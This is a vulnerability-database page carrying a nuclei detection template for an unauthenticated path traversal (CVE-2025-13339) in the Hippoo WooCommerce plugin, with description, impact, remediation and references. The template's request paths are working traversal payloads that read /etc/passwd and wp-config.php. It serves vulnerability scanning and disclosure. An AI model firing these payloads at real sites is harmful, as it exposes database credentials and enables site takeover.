Lucene search
K

Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated path traversal in Hippoo Mobile App for WooCommerce up to 1.7.1 allows reading arbitrary files.

Related
Refs
Code
id: CVE-2025-13339

info:
  name: Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read
  author: pussycat0x
  severity: high
  description: |
    The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).
  impact: |
    An unauthenticated attacker can read any file readable by the web server process (www-data), including wp-config.php (database credentials, authentication keys and salts), /etc/passwd, server configuration files, and application source code. Exfiltration of wp-config.php alone enables database compromise and WordPress cookie forgery for full site takeover.
  remediation: Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/changeset/3412701/
    - https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-13339
    cwe-id: CWE-22
    epss-score: 0.02056
    epss-percentile: 0.7897
  metadata:
    verified: true
    max-request: 2
    vendor: hippoo
    product: hippoo-mobile-app-for-woocommerce
    framework: wordpress
    shodan-query: http.component:"WordPress"
    fofa-query: body="hippoo"
  tags: cve,cve2025,wordpress,wp-plugin,hippoo,lfi,woocommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/?hippoo_serve=../../../../../../../etc/passwd"
      - "{{BaseURL}}/?hippoo_serve=../../../../wp-config.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body) || contains_all(body, 'DB_NAME', 'DB_PASSWORD')"
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220027bf5160c636ea2776ee01aceafc8a7df9879af25f98a555210628a6ad56bea022100d6d5db9cc4701fe6b4ada18b52e7b0686d869a4e9a2247661c54fc4f6505a5e4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation